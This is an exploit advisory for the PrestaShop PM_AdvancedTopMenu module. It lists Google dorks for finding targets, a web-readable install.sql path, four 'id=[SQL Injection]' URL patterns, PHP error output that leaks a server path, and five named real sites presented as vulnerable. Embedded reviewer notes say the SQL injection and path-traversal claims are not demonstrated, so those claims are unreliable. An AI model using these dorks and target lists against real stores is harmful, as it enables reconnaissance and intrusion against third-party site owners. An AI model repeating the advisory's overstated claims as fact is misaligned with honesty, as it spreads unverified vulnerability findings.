#################################################################################################
# Exploit Title : PrestaShop PM_AdvancedTopMenu 1.4.6.2 Database Disclosure and SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html + prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/ + addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html
# Software Price : $50
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_advancedtopmenu/'' intext:''Hexagone High-Tech se fournit chez'' intext:''création: webncie // © Eight-Racing.com 2013-2014 tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Reviewer note : of the CWEs listed, only CWE-200 (information exposure) is demonstrated by the evidence in this advisory; nothing below shows a path-traversal primitive (CWE-23) or a working SQL injection (CWE-89).
#################################################################################################
# Database Disclosure Exploit : /modules/pm_advancedtopmenu/install.sql
#   The module's SQL installation script is directly web-readable. Presumably it contains the module's table definitions; this discloses schema, not the store's data, so "database disclosure" overstates the impact.
# SQL Injection Exploit : /modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL Injection]
#   Note : no injection payload, vulnerable parameter behaviour or database error message is given for the id parameter. The output below is what these files return when requested directly, outside the PrestaShop bootstrap (the 'Module' / 'ObjectModel' classes are not loaded), so it does not demonstrate SQL injection; treat that claim as unverified until tested.
#################################################################################################
# Example output when the module's PHP files are requested directly (PHP include warnings and fatal errors, not a SQL error; note that they also leak the site's absolute filesystem path) => Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/
pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Fatal error: Class 'Module' not found in
/home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 23
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13
#################################################################################################
# Example Vulnerable Sites (each listed URL only shows that install.sql is fetchable on that host) =>
[+] hexagone.mg/modules/pm_advancedtopmenu/install.sql
[+] griffin.ch/modules/pm_advancedtopmenu/install.sql
[+] eight-racing.com/modules/pm_advancedtopmenu/install.sql
[+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql
[+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################